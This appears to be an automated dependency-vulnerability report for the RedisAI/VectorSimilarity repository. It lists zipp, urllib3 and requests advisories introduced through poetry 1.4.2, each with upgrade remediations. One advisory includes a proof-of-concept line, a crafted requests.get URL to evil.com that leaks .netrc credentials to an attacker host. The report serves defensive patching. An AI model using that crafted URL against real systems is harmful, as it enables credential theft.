Vulnerabilities

4 via 20 paths

Dependencies

48

Source

GitHub

Commit

1a15b598

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 4
  • 1
Severity
  • 5
Status
  • 5
  • 0
  • 0

medium severity

Infinite loop

  • Vulnerable module: zipp
  • Introduced through: poetry@1.4.2

Detailed paths

  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 build@0.10.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 jsonschema@4.17.3 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.7.0.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 keyring@23.13.1 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 poetry-core@1.5.2 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 jsonschema@4.17.3 importlib-resources@5.12.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.7.0.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 keyring@23.13.1 importlib-resources@5.12.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 jsonschema@4.17.3 attrs@24.2.0 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.7.0.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 poetry-plugin-export@1.4.0 poetry-core@1.5.2 importlib-metadata@6.7.0 zipp@3.15.0
    Remediation: Upgrade to poetry@1.8.3.

Overview

Affected versions of this package are vulnerable to Infinite loop where an attacker can cause the application to stop responding by initiating a loop through functions affecting the Path module, such as joinpath, the overloaded division operator, and iterdir.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade zipp to version 3.19.1 or higher.

References

medium severity

Open Redirect

  • Vulnerable module: urllib3
  • Introduced through: poetry@1.4.2

Detailed paths

  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 urllib3@1.26.20
    Remediation: Upgrade to poetry@1.6.0.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests@2.31.0 urllib3@1.26.20
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 dulwich@0.21.7 urllib3@1.26.20
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 cachecontrol@0.12.14 requests@2.31.0 urllib3@1.26.20
    Remediation: Upgrade to poetry@1.4.2.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests-toolbelt@0.10.1 requests@2.31.0 urllib3@1.26.20

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Open Redirect due to the retries parameter being ignored during PoolManager instantiation. An attacker can access unintended resources or endpoints by leveraging automatic redirects when the application expects redirects to be disabled at the connection pool level.

Note:

requests and botocore users are not affected.

Workaround

This can be mitigated by disabling redirects at the request() level instead of the PoolManager() level.

Remediation

Upgrade urllib3 to version 2.5.0 or higher.

References

medium severity

Insertion of Sensitive Information Into Sent Data

  • Vulnerable module: requests
  • Introduced through: poetry@1.4.2

Detailed paths

  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests@2.31.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 cachecontrol@0.12.14 requests@2.31.0
    Remediation: Upgrade to poetry@1.4.2.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests-toolbelt@0.10.1 requests@2.31.0

Overview

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data due to incorrect URL processing. An attacker could craft a malicious URL that, when processed by the library, tricks it into sending the victim's .netrc credentials to a server controlled by the attacker.

Note:

This is only exploitable if the .netrc file contains an entry for the hostname that the attacker includes in the crafted URL's "intended" part (e.g., example.com in http://example.com:@evil.com/).

PoC

requests.get('http://example.com:@evil.com/')

Remediation

Upgrade requests to version 2.32.4 or higher.

References

medium severity

Always-Incorrect Control Flow Implementation

  • Vulnerable module: requests
  • Introduced through: poetry@1.4.2

Detailed paths

  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests@2.31.0
    Remediation: Upgrade to poetry@1.8.3.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 cachecontrol@0.12.14 requests@2.31.0
    Remediation: Upgrade to poetry@1.4.2.
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests-toolbelt@0.10.1 requests@2.31.0

Overview

Affected versions of this package are vulnerable to Always-Incorrect Control Flow Implementation when making requests through a Requests Session. An attacker can bypass certificate verification by making the first request with verify=False, causing all subsequent requests to ignore certificate verification regardless of changes to the verify value.

Notes:

  1. For requests <2.32.0, avoid setting verify=False for the first request to a host while using a Requests Session.

  2. For requests <2.32.0, call close() on Session objects to clear existing connections if verify=False is used.

  3. This vulnerability was initially fixed in version 2.32.0, which was yanked. Therefore, the next available fixed version is 2.32.2.

Remediation

Upgrade requests to version 2.32.2 or higher.

References

medium severity

MPL-2.0 license

  • Module: certifi
  • Introduced through: poetry@1.4.2

Detailed paths

  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests@2.31.0 certifi@2025.10.5
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 cachecontrol@0.12.14 requests@2.31.0 certifi@2025.10.5
  • Introduced through: RedisAI/VectorSimilarity@RedisAI/VectorSimilarity#1a15b598562d8dca01fcedd85df2c1ca36f394df poetry@1.4.2 requests-toolbelt@0.10.1 requests@2.31.0 certifi@2025.10.5

MPL-2.0 license